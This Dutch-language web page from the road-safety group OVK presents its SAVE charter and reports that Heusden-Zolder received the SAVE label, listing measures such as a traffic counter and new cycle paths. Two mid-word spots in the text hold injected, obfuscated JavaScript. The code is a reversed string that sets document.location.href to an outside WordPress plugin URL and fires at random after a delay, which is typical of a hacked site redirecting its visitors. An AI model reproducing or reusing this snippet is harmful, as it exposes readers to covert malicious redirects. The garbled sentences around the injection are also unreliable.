Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Heusden-Zolder ontvangt het SAVE-label

Op woensdag 16 september ontving Heusden-Zolder als 13e in Vlaanderen en 2e in Limburg het SAVE-label (enkel Riemst ging hen in Limburg al voor). “Het SAVE-actieplan werd opgesteld in 2014 en was gekoppeld aan het mobiliteitsplan”, zegt burgemeester Mario Borremans.

Sinds de goedkeuring van het actieplan zijn er al enkel acties uit het plan gerealiseerd of verder uitgewerkt. Zo beschikt de gemeente opnieuw over een verkeersteller die cijfers geeft van het aantal passanten op een bepaalde plaats, hun snelheden en het soort voorbijgangers (autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, bus, vrachtwagen, fietser …). Op basis van de gegevens van de verkeersteller kan het bestuur beslissen of er ergens structurele ingrepen nodig zijn om de snelheid van het verkeer af te remmen. Daarnaast werden alle Trage Wegen in de gemeente geïnventariseerd en zullen de dorpsraden voor hun deelgemeente bekijken welke Trage Wegen prioritair aangepakt zullen worden. Ook de communicatie van flitscontroles of de controles met verkeersdisplays werd terug opgestart. De bestaande fietskaarten met de meest veilige routes en de knelpunten voor elke school zullen aangepast worden en heruitgegeven in het voorjaar van 2016. Tenslotte realiseerde de gemeente ook een aantal verkeerstechnische ingrepen die de veiligheid van de fietser ten goede komen: nieuwe fietspaden in de Jeugdlaan en de Kanaalweg, beveiligde oversteek aan school Beekbeemden en het aanleggen van nieuw fietspad en rotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonde Molenstraat.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be